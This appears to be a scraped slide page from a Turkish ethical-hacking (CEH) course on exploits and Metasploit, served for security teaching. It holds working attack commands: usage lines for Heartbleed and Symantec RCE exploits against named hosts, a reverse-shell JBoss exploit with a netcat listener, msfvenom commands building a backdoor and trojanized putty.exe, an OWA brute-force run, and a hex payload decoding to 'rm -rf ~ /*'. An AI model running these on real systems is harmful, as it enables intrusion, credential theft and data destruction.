3. parti firma risklerinden nasıl korunulur?
3. parti firma risklerinden nasıl korunulur?3. parti firma risklerinden nasıl korunulur?
3. parti firma risklerinden nasıl korunulur?BGA Cyber Security
 
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware SaldırılarıBir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware SaldırılarıBGA Cyber Security
 
Webinar: Popüler black marketler
Webinar: Popüler black marketlerWebinar: Popüler black marketler
Webinar: Popüler black marketlerBGA Cyber Security
 
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım SenaryolarıWebinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım SenaryolarıBGA Cyber Security
 
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020BGA Cyber Security
 
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm ÖnerileriDNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm ÖnerileriBGA Cyber Security
 
Webinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
Webinar: Siber Güvenlikte Olgunluk Seviyesini ArttırmakWebinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
Webinar: Siber Güvenlikte Olgunluk Seviyesini ArttırmakBGA Cyber Security
 
Open Source Soc Araçları Eğitimi 2020-II
Open Source Soc Araçları Eğitimi 2020-IIOpen Source Soc Araçları Eğitimi 2020-II
Open Source Soc Araçları Eğitimi 2020-IIBGA Cyber Security
 
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner GüvenliğiWebinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner GüvenliğiBGA Cyber Security
 
Hacklenmiş Windows Sistem Analizi
Hacklenmiş Windows Sistem AnaliziHacklenmiş Windows Sistem Analizi
Hacklenmiş Windows Sistem AnaliziBGA Cyber Security
 
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİRAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİBGA Cyber Security
 
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing RaporuBGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing RaporuBGA Cyber Security
 
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu ÇözümlerSOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu ÇözümlerBGA Cyber Security
 
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of SecretsVeri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of SecretsBGA Cyber Security
 
Aktif Dizin (Active Directory) Güvenlik Testleri - I: Bilgi Toplama
Aktif Dizin (Active Directory) Güvenlik Testleri - I:  Bilgi ToplamaAktif Dizin (Active Directory) Güvenlik Testleri - I:  Bilgi Toplama
Aktif Dizin (Active Directory) Güvenlik Testleri - I: Bilgi ToplamaBGA Cyber Security
 

More from BGA Cyber Security (20)

WEBSOCKET Protokolünün Derinlemesine İncelenmesi
WEBSOCKET Protokolünün Derinlemesine İncelenmesiWEBSOCKET Protokolünün Derinlemesine İncelenmesi
WEBSOCKET Protokolünün Derinlemesine İncelenmesi
 
Tatil Öncesi Güvenlik Kontrol Listesi.pdf
Tatil Öncesi Güvenlik Kontrol Listesi.pdfTatil Öncesi Güvenlik Kontrol Listesi.pdf
Tatil Öncesi Güvenlik Kontrol Listesi.pdf
 
Ücretsiz Bilgi Güvenliği Farkındalık Eğitimi
Ücretsiz Bilgi Güvenliği Farkındalık EğitimiÜcretsiz Bilgi Güvenliği Farkındalık Eğitimi
Ücretsiz Bilgi Güvenliği Farkındalık Eğitimi
 
3. parti firma risklerinden nasıl korunulur?
3. parti firma risklerinden nasıl korunulur?3. parti firma risklerinden nasıl korunulur?
3. parti firma risklerinden nasıl korunulur?
 
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware SaldırılarıBir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
 
Webinar: Popüler black marketler
Webinar: Popüler black marketlerWebinar: Popüler black marketler
Webinar: Popüler black marketler
 
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım SenaryolarıWebinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
 
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
 
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm ÖnerileriDNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
 
Webinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
Webinar: Siber Güvenlikte Olgunluk Seviyesini ArttırmakWebinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
Webinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
 
Open Source Soc Araçları Eğitimi 2020-II
Open Source Soc Araçları Eğitimi 2020-IIOpen Source Soc Araçları Eğitimi 2020-II
Open Source Soc Araçları Eğitimi 2020-II
 
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner GüvenliğiWebinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
 
Hacklenmiş Windows Sistem Analizi
Hacklenmiş Windows Sistem AnaliziHacklenmiş Windows Sistem Analizi
Hacklenmiş Windows Sistem Analizi
 
Open Source SOC Kurulumu
Open Source SOC KurulumuOpen Source SOC Kurulumu
Open Source SOC Kurulumu
 
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİRAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
 
Siber Fidye 2020 Raporu
Siber Fidye 2020 RaporuSiber Fidye 2020 Raporu
Siber Fidye 2020 Raporu
 
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing RaporuBGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
 
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu ÇözümlerSOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
 
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of SecretsVeri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
 
Aktif Dizin (Active Directory) Güvenlik Testleri - I: Bilgi Toplama
Aktif Dizin (Active Directory) Güvenlik Testleri - I:  Bilgi ToplamaAktif Dizin (Active Directory) Güvenlik Testleri - I:  Bilgi Toplama
Aktif Dizin (Active Directory) Güvenlik Testleri - I: Bilgi Toplama
 

Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 4, 5, 6

  • 1. @BGASecurity BEYAZ ŞAPKALI HACKER EĞİTİMİ BÖLÜMLER IV – V – VI - 2014-
  • 2. @BGASecurity BGA Bilgi Güvenliği A.Ş BGA Security Hakkında Siber güvenlik dünyasına yönelik, yenilikçi profesyonel çözümleri ile katkıda bulunmak amacı ile 2008 yılında kurulan BGA Bilgi Güvenliği A.Ş. stratejik siber güvenlik danışmanlığı ve güvenlik eğitimleri konularında büyük ölçekli çok sayıda kuruma hizmet vermektedir. Gerçekleştirdiği vizyoner danışmanlık projeleri ve nitelikli eğitimleri ile sektörde saygın bir yer kazanan BGA Bilgi Güvenliği, kurulduğu günden bugüne kadar alanında lider finans, enerji, telekom ve kamu kuruluşları ile 1.000'den fazla eğitim ve danışmanlık projelerine imza atmıştır. ARGE EĞİTİM MSSP PENTEST SOME / SOC SECOPS BGA | Hakkında
  • 4. BGA | CEH @BGASecurity Sistemlere Sızma Yöntemleri  Günümüzde açıklıklar yoğun olarak network seviyesinde iki port üzerinde gözükmektedir (80/443)  Uygulama seviyesi güvenlik zafiyetleri kullanılarak işletim sistemi, LAN ve DMZ bölgeleri ele geçirilebilir.  Gerekli önlemler alınmadığı durumlarda  Sistemlerde açıklık bulma, açıklığı istismar etme ve sistemi ele geçirme farklı adımlardır ve farklı alanlarda uzmanlık ister.
  • 5. BGA | CEH @BGASecurity Exploit|Genel Kavramlar  Exploit nedir?  Exploit çeşitleri  Hangi dille yazılır ?  Exploit araştırma teknikleri  Yazması zor mudur?  Exploit Frameworkleri
  • 6. BGA | CEH @BGASecurity Exploit Nedir?  Exploit (Ingilizce to exploit - kötüye kullanmak) bir bilgisayar programı veya bir script, bilgisayar programlarında bulunan zayıflık veya hatalar için kullanılır.  Vikipedia http://en.wikipedia.org/wiki/Exploit_(computer_security)  Teknik olarak , pentest çalışmalarında ya da siber saldırılarda varolan bir güvenlik zafiyetini istismar ederek sisteme sızmaya yol açacak yazılım/script.
  • 7. BGA | CEH @BGASecurity Exploit Çeşitleri  Farklı amaçlarla kullanılan exploit çeşitleri vardır  Exploit çeşitlerinden bazıları  Local Exploits  Remote Exploits  Dos-Exploits  Zero-Day-Exploits
  • 8. BGA | CEH @BGASecurity Remote Exploits  Sistemlere sadece uzaktan erişilerek çalıştırılabilen exploit çeşidi.  Bu exploit çeşidinde hedef sisteme ağ üzerinden bağlantının olması yeterli olmaktadır.  Web tabanlı ya da network tabanlı olabilir.
  • 9. BGA | CEH @BGASecurity Remote Exploit - Heartbleed  Uzaktan sisteme ait memory den bilgi açığa çıkarma(Memory disclosure-Information leakage)  Yahoo üzerinde binlerce kullanıcı kullanıcı adı ve parolası ele geçirildi.  http://www.exploit-db.com/exploits/32745/  Kullanımı: python heartbleed.py www.baku.ws -p 443  Alexa kayıtlarından heartbleed açıklığı barındıran sistemler: https://zmap.io/heartbleed/
  • 10. BGA | CEH @BGASecurity Heartbleed Information Leakage  En sıcak örneği OpenSSL heartbleed açıklığı  OpenSSL üzerindeki bilgi açığa çıkarma açıklığı kullanılarak SSL akan trafikler okunabilmiş ve kullanıcılara ait username/password , eposta vs. okunabilmiştir.
  • 11. BGA | CEH @BGASecurity Remote Exploit – SEP Remote Code Exe  Symantec End Point Sunucusu üzerinde uzaktan komut çalıştırmaya izin veren bir açıklık.  SEP sunucu işletim sistemi bazında ele geçirilebilir.  http://www.exploit-db.com/exploits/31853/  Kullanımı: python sep_exploit.py -t 192.168.1.100 -c "net user bga P@ssw0rd /add" python sep_exploit.py -t 192.168.1.100 -c "net localgroup Administrators bga /add"
  • 12. BGA | CEH @BGASecurity Remote exploit – F5 Big IP Auth. bypass  SSH servisi dışarı açık olan f5 big IP load balancerlar etkilenmiştir.  Tüm F5’lere erişim sağlanabilecek bir ssh private key keşfedilmiş ve bunla root haklarında sisteme erişilebilmiştir.  http://www.exploit-db.com/exploits/19091/  Kullanımı: root@bt:~/Desktop/pentesttool/f5 big ip# python f5.py Enter the IP address of the F5: 5.5.5.5 root@f5:>
  • 13. BGA | CEH @BGASecurity Local Exploits  Sadece uzaktan erişimin yeterli olmadığı, hedef sistem üzerinde yetkili/düşük yetkili sistem hesabı gerektiren exploit çeşidi.  Linux kernel exploitleri bu exploit tipine en iyi örnektir.  İstismar kodunu çalıştırabilmek için Linux sistem üzerinde komut çalıştırabilmek gerekir.
  • 14. BGA | CEH @BGASecurity DoS Exploits  Çalıştırıldığında hedef sisteme erişim izni vermeyen fakat hedef sistemin çalışamaz, erişilemez hale gelmesini sağlayan exploit çeşidi.  Tehlike seviyesi diğerlerine göre daha düşüktür.
  • 15. BGA | CEH @BGASecurity 0 day Exploit  Açığı bulan kişi/grup açıklığı firmaya bildirmeden exploitini yazarak yayınlar/satar.  Exploitten firma ile saldırganlar aynı anda haberdar olur ve bir yarış başlar.
  • 16. BGA | CEH @BGASecurity Exploit Araştırma Kaynakları  Exploitler iki şekilde elde edilebilir:  Google ve benzeri arama motorları kullanarak genele açık, yayınlanmış exploitler bulunabilir.  Sadece belirli kişilerin üye olabileceği underground forumlarda, IRC odalarında ve dışa kapalı e-posta listelerinde  Değerli exploitler genellikle genele açılmadan önce 2-3 aylık bir satış –özel kullanım- süreci yaşarlar.  Exploit sat-al işlemi ciddi paralar kazandıran bir ticaret biçimidir.
  • 17. BGA | CEH @BGASecurity exploit-db.com  En güncel ve güvenilir exploit araştırma sitesi  Açıklığı barındıran uygulamanın güncel olmayan sürümüne erişim bilgisi de sunar.  Web tabanlı açıklıklar için Google üzerinde arama imkanı sunar.  Gönderilen exploitler bir kalite kontrol sürecinden geçer, fake exploitleri kabul etmezler
  • 18. BGA | CEH @BGASecurity Kali üzerinde exploit-db veritabanı  Kali üzerinde /usr/share/exploitdb altında tüm exploit-db.com exploitleri mevcuttur.  Searchsploit aracı ile aşağıdaki gibi arama yapılabili. searchsploit tomcat windows remote Searchspoit kernel linux local
  • 21. BGA | CEH @BGASecurity Google Üzerinden Exploit Arama  Bazı exploitler exploit-db ve securityfocus’da olmayabilir  Bu tip exploit aramalarında en sağlıklı yollardan biri Google’a sormaktır  Bind DOS açıklığı exploiti araştırması  Internetten indirilecek her exploit güvenilir midir?  Örnek:
  • 22. BGA | CEH @BGASecurity Sahte Exploit Kavramı  Ava giderken avlanma!  Exploit vs gibi konularda yeterli bilgi sahibi olmayan meraklı “hacker”ları kandırmak ve sistemlerini ele geçirmek amacıyla –genellikle eğlence amaçlı- gerçekleştirilir.  Exploit kodu (payload kısmı) genellikle hex encode edilerek verilir.  Exploit çalıştırıldığında çalıştığı sistemi silebilir, başka sistemlere bilgi taşıyabilir.
  • 23. BGA | CEH @BGASecurity Sahte Exploit Örneği-I
  • 24. BGA | CEH @BGASecurity Sahte Exploit Örneği-II char jmpcode[] = "x72x6Dx20x2Dx72x66x20x7ex20x2Fx2Ax20x32x3ex20x2f" "x64x65x76x2fx6ex75x6cx6cx20x26"; ?????r?m? ?-?r?f? ?~? ?/?*? ?2?>? ?/??????d?e?v?/?n?u?l?l? ?&? "rm -rf ~ /* 2> /dev/null &"
  • 25. BGA | CEH @BGASecurity Exploit Çalıştırma  Script tabanlı exploitler  Python, Perl ile yazılmış exploitler  C/C++ dilleri ile yazılmış exploitlerin çalıştırılması  Her exploitin çalıştırılmaıs için gerekli komut satırı parametreleri farklıdır.  Her sistem, her sistemde yüklü olan yama seviyesine göre farklı exploit çalıştırmak gerekebilir.  Script tabanlı exploitlerin payloadları genellikle iki tane olur (bind TCP, reverse TCP)
  • 26. BGA | CEH @BGASecurity Exploit Geliştirme/Çalıştırma  Exploit geliştirme ve çalıştırma birbirinden farklı işlemlerdir  Exploit geliştirme ve güvenlik zafiyet bulma birbirinden farklı uzmanlık isteyen konulardır.  Exploit geliştirme günümüzde işletim sistemlerinin getirdiği ek korumalar (geliştirme kütüphanelerinin de) sayesinde oldukça zor bir hale getirilmiştir.  Exploit çalıştırma en basit işlemdir.  Oku, izle, kur çalıştır!
  • 27. BGA | CEH @BGASecurity Exploit Çalıştırmanın Zararları  Bazı exploit denemeleri hedef sistemin durmasına, servisin zedelenmesine veya crash olmasına neden olabilir.  Pentest çalışmalarında önce exploit lab. Ortamında denenmeli
  • 28. BGA | CEH @BGASecurity C Tabanlı Exploitlerin Çalıştırılması
  • 29. BGA | CEH @BGASecurity Otomatize Exploit Çalıştırma  Neden ihtiyaç duyuldu?  Binlerce exploit var  Her exploit belirli bir sisteme(işletim sistemi, yazılım versiyonu) özel yazılıyor.  Kurulum dili bile farklı olsa exploit çalışmayabilir  Tüm bunları aşmak için bir framework gerekir
  • 30. BGA | CEH @BGASecurity Otomatik Exploit Çalıştırma Eksileri  Hangi durumlarda otomatik exploit çalıştırma araçları avantajlı/dezavantajlı olur?  Özellikle local exploitlerde (Linux kernelini ilgilendiren) metasploit için geliştirilmiş exploit yoktur.  Bu durumda internet üzerinden araştırma yapılarak bulunabilir.  Exploitin indirileceği site herhangi bir site olmamalıdır (sahte exploitlere önlem olarak)
  • 31. BGA | CEH @BGASecurity Jboss Jmx-console Örneği  Metasploit Jboss exploitleri stabil değildir.  4 uygulamadan 3’ü sağlıklı çalışmamaktadır.
  • 32. BGA | CEH @BGASecurity Jboss Metasploit’siz Exploiti(perl)  Local: nc –l –v –p 443  Exploit çalıştır: perl daytona.pl 192.168.2.10 8080 192.168.2.2 443 lnx/win Başarılı olması durumunda netcat ile dinlenen arayüzde hedef sisteme komut gönderilebilir duruma gelincektir. http://www.exploit-db.com/exploits/16274/
  • 33. BGA | CEH @BGASecurity Linux Local Root Exploiti Arama  Linux kernel versiyonu belirleme  Uname –a http://rmccurdy.com/scripts/downloaded/localroot/ # uname -a FreeBSD s-guard19 8.1-RELEASE FreeBSD 8.1- RELEASE #0:Tue Dec 21 08:21:08 CST 2010 root@server3:/usr/obj/usr/src/sys/server3 amd64 $ uname -a Linux bt5r2 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux
  • 34. BGA | CEH @BGASecurity Uygulama|FreeBSD Local Root Exploit %uname -a;id; FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 15:48:17 UTC 2009 uid=1001(kcope) gid=1001(users) groups=1001(users) %./w00t.sh FreeBSD local r00t zeroday by Kingcope November 2009 env.c: In function 'main': env.c:5: warning: incompatible implicit declaration of built-in function 'malloc' env.c:9: warning: incompatible implicit declaration of built-in function 'strcpy' env.c:11: warning: incompatible implicit declaration of built-in function 'execl‘ ALEX-ALEX # uname -a;id; FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 15:48:17 UTC 2009 root () almeida cse buffalo edu:/usr/obj/usr/src/sys/GENERIC i386 uid=1001(kcope) gid=1001(users) euid=0(root) groups=1001(users)
  • 35. BGA | CEH @BGASecurity Otomatize Exploit Araçları  Core Impact  Immunity Canvas  ExploitPack  Metasploit Framework  W3af  Sqlmap (Metasploit desteğiyle)
  • 39. BGA | CEH @BGASecurity Metasploit Kullanarak Sistemlere Sızma
  • 40. BGA | CEH @BGASecurity Metasploit Framework Projesi  Metasploit Framework projesi exploit teknikleri ile istismarları hakkında bilgi sağlamakta.  Oluşturduğu yapı ile güvenlik denetçilerine, IDS imza geliştirme ve istismar araştırmaları yapan uzmanlara, hackerlara faydalı bilgiler vermekte ve exploit geliştiricileri için bir çatı oluşturmaktadır.  Metasploit bir toplum projesi Metasploit LLC tarafından yönetilmekteydi.  Rapid7 firmasına satıldıkdan sonra Pro ve Community sürümleri ile devam etmektedir.
  • 41. BGA | CEH @BGASecurity Metasploit Tarihçesi  İlk olarak ağ güvenliği oyunu amaçlı geliştirilmiştir  Sonraları perl tabanlı bir exploit geliştirme çatısı olarak kullanıma sunuldu  Haziran 2004 : 2.1 stable sürümü yayınlandı  Mart 2007 3.0 stable sürümü yayınlandı  Eski sürümlerde perl temel alınırken yeni sürümlerde tamamen Ruby’e geçilmiş durumda
  • 42. BGA | CEH @BGASecurity Metasploit Framework | Özellikleri Özellikleri ;  Community ve Pro sürümleri bulunmakta.  800 exploits - 435 auxiliary - 134 post -246 payloads – 27 encoders - 8 nop bulunuyor  Çok farkli türde payload’lar kullanilabiliyor  Meterpreter  VNC DLL Injection  Binary Upload  PassiveX
  • 43. BGA | CEH @BGASecurity Metasploit Framework | Güncelleme  Metasploit hızla gelişen bir araçtır.  Hergün, her saat yeni güvenlik açıkları keşfedilmekte ve bunları sömüren kodlar yazılmaktadır.  Yeni payload ,encoder, exploit, ve NOP hazırlandığında metasploiti update ederek kullanabilirsiniz.  Linux sistemlerde komut satırından “msfupdate” komutu çalıştırılarak güncelleme yapılır.
  • 44. BGA | CEH @BGASecurity Temel Metasploit Bileşenleri Aux Modülleri Exploit Modülleri Payload Post Exploit Modülleri
  • 45. BGA | CEH @BGASecurity Payload Kavramı ?  Exploit sonrasi çalışıp yetkisiz işlevi gerçeklestirecek içerik.  Exploit çalıştırıldığında gerçekleştireceği eylemi belirten içerik.  Reverse bağlantı mı gerçekleştirecek?  Bir porta bind mi olacak ?  Shell mi verecek shell mi alacak vs.  Show payloads komutu kullanılabilir.
  • 46. BGA | CEH @BGASecurity Üst Düzey Bazı Payloadlar Metasploit Frameworkde kullanılan üst düzey farklı işlevselliğe sahip payloadlar bulunmaktadır. Bunlardan bazıları ;  Meterpreter  DLL Injection  Binary Upload  PassiveX  Download and Exec  Adduser
  • 47. BGA | CEH @BGASecurity Shellcode Nedir ?  Açıklığı istismar edilmesi ile sisteme (/bin/bash veya cmd.exe komut gönderme) gibi eylemleri yapan exploit kodunun ilgili bölümü.  Exploit sonrasi çalisicak olan platforma özel binary’ler.  Metasploit’de bulunan payload’ların farklı dillerde shellcode çıktısı alınabilir.
  • 48. BGA | CEH @BGASecurity Msfpayload ile Shellkod oluşturma  Farklı dillerde shellcode oluşturulabilir. Payloadın farklı formatlarda shellcode çıktısını alabiliriz, örneğin; C,Perl,raw,java,js vb.
  • 49. BGA | CEH @BGASecurity Encoder Kavramı  Metasploit Encoder, istenilen payloadın içeriğini değiştirerek Saldırı Tespit ve Engelleme Sistemleri (IDS/IPS), Güvenlik Duvarları (Firewall) ve Antivirüsler tarafından tanınmasını engeller/zorlaştırır.  Metasploit Frameworkde 27+ encoder bulunuyor.
  • 50. BGA | CEH @BGASecurity Nop Nedir? “Not Operation” , bellek yeri öğrenme amaçlı bellek dolduran bitler. Genellikle saldırı tespit ve engelleme sistemlerini yanıltmak için kullanılır.
  • 51. BGA | CEH @BGASecurity Metasploit Encoder Çeşitleri Encoder Listesi
  • 52. BGA | CEH @BGASecurity Msfvenom ile zararlı oluşturma  Msfvenom –l payloads // Payloadları listelemek için  Msfvenom –l encoders //Encoderları listelemek için  Zararlı oluşturmak için msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.12 LPORT=443 -a x86 --platform win -e x86/shikata_ga_nai -i 3 -f exe > /var/www/backdoor.exe  Bilinen bir .exe içerisine zararlı yerleştirme msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.12 LPORT=443 -a x86 --platform win -x /root/Desktop/putty.exe -k -e x86/shikata_ga_nai -i 3 -f exe > /var/www/putty5.exe
  • 53. BGA | CEH @BGASecurity Metasploit Auxiliary Modülleri  Modüller için geliştirilmiş ek programcıklar, yardımcı araçlardır.  Exploit öncesi bilgi toplamak, exploit sonrası hedef sistemde ilerlemek için kullanılır.  Metasploit’de en fazla kullanılan bileşenlerden biri Aux modülleridir.
  • 55. BGA | CEH @BGASecurity Msfconsole Öncesi  Msfconsole komutu verilmeden önce aşağıdaki gibi postgresql ve metasploit servisleri başlatılmalıdır. service postgresql start service metasploit start  Msfconsole komutu ile metasploit konsoldan açılır.  db_status ile veritabanı durumu görüntülenebilir. msf > db_status [*] postgresql connected to msf3  Veritabanı bağlantısı yapılmışsa aşağıdaki komut çalıştırılarak rebuild edilir.  msf > db_rebuild_cache //Aramalardaki gecikmenin kalkması için
  • 56. BGA | CEH @BGASecurity Aktif Metasploit Kullanımı: Msfconsole  Metasploit komut satırı aracıdır. Unix sistemlerde metasploit dizinine geçilerek “msfconsole” komutu yazılarak başlatılır.  Windows sistemlerde ise web arayüzünden “Console” seçilerek erişim kurulur.  Msfconsole ile payloadlar, exploitler, encoderlar, NOP lar ve auxiliary modulleri kullanılabilir.  Metasploit komut satırı (msfconsole) açılışında metasploit logosu gelir.
  • 58. BGA | CEH @BGASecurity Msfconsole | Temel Komutlar Komut Açıklama ? Yardım menüsü back Mevcut seçenekten bir adım geriye döner banner Metasploit açılış bannerlarını gösterir cd Dizin atlamak için kullanılır color Renk seçeneklerini ayarlar connect Uzak bir sunucuya bağlantı kurar exit Konsoldan çıkışı sağlar help Yardım menüsü info Bir veya daha fazla modul hakkında bilgi verir
  • 59. BGA | CEH @BGASecurity Msfconsole | Temel Komutlar II –tabloya alınacak Komut Açıklama irb İrb scripting modunu getirir jobs Yapılan işleri gösterir ve düzenler kill Çalışan bir görevi öldürür. load Framework için eklenti yükler loadpath Belirtilen yoldan istenilen modulu/exploiti yükler makerc Başlangıçtan itibaren kullanılan komutları bir dosyaya yazar quit Konsoldan çıkışı sağlar route Oturumun trafik rotasını belirler Save Etkin veriyi kayıteder, depolar
  • 60. BGA | CEH @BGASecurity Msfconsole | Temel Komutlar Komut Açıklama set Ayarların konfigure edilmesinde kullanılan atama komutu setg Genel bir değer, değişken atar show Belirtilen modülü veya tüm modülleri listeler sleep Verilen zaman içinde uyku moduna geç, birşey yapma unload Framework için mevcut eklentiyi kaldırır unset Atanan değeri kaldırır unsetg Yapılan genel bir değeri, değişkeni kaldırır use Modülü seçer version Konsol uygulamasının versiyonunu gösterir search Modül ismi veya açıklamalarda arama yapar sessions Aktif oturumları gösterir ve oturum bilgisi verir
  • 61. BGA | CEH @BGASecurity Msfconsole | Aux | Port Scanning Port tarama için arka planda nmap kullanır. Port tarama araçlarını görüntülemek için portscan araması yapılabilir.
  • 63. BGA | CEH @BGASecurity Msfconsole | Aux. | OWA Brute Force msf > search owa Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- auxiliary/scanner/http/owa_login normal Outlook Web App (OWA) Brute Force Utility
  • 64. BGA | CEH @BGASecurity Msfconsole | Auxiliary | OWA Brute Force msf auxiliary(owa_login) > set USERPASS_FILE /root/owa_test USERPASS_FILE => /root/owa_test msf auxiliary(owa_login) > set RPORT 443 RPORT => 443 msf auxiliary(owa_login) > set VHOST mail.HEDEF_SITE.com.tr VHOST => mail.HEDEF_SITE.com.tr msf auxiliary(owa_login) > run [*] mail.HEDEF_SITE.com.tr:0 OWA – Testing version 2010 [*] mail.HEDEF_SITE.com.tr:443 OWA – Testing version 2010 [-] mail.HEDEF_SITE.com.tr:443 OWA – FAILED LOGIN. ‘ali’ : ‘ali’ [*] mail.HEDEF_SITE.com.tr:443 OWA – Trying sam : sam [-] mail.HEDEF_SITE.com.tr:443 OWA – FAILED LOGIN. ‘sam’ : ‘sam’ [*] mail.HEDEF_SITE.com.tr:443 OWA – Trying user : user [*] mail.HEDEF_SITE.com.tr:443 OWA – Trying HEDEF_SITE : grt [-] mail.HEDEF_SITE.com.tr:443 OWA – FAILED LOGIN. ‘HEDEF_SITE’: ‘grt’ [*] Auxiliary module execution completed
  • 66. BGA | CEH @BGASecurity Msfconsole | Exploit Hakkında Bilgi  Exploit Hakkında Bilgi Almak Exploit seçiminden önce, exploit hakkında detaylı bilgi almak için “info” komutu kullanılabilir. En temel kullanımı “info exploit_adı” şeklindedir.
  • 67. BGA | CEH @BGASecurity Msfconsole | Exploit Seçimi  Exploit Seçimi Herhangi bir arama kriterleri yoksa, kullanılabilir exploit’lerin tamamını görüntülemek için “show exploits” komutu kullanılabilir.  Exploit seçimi, “use” komutu ile yapılmaktadır. msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) >
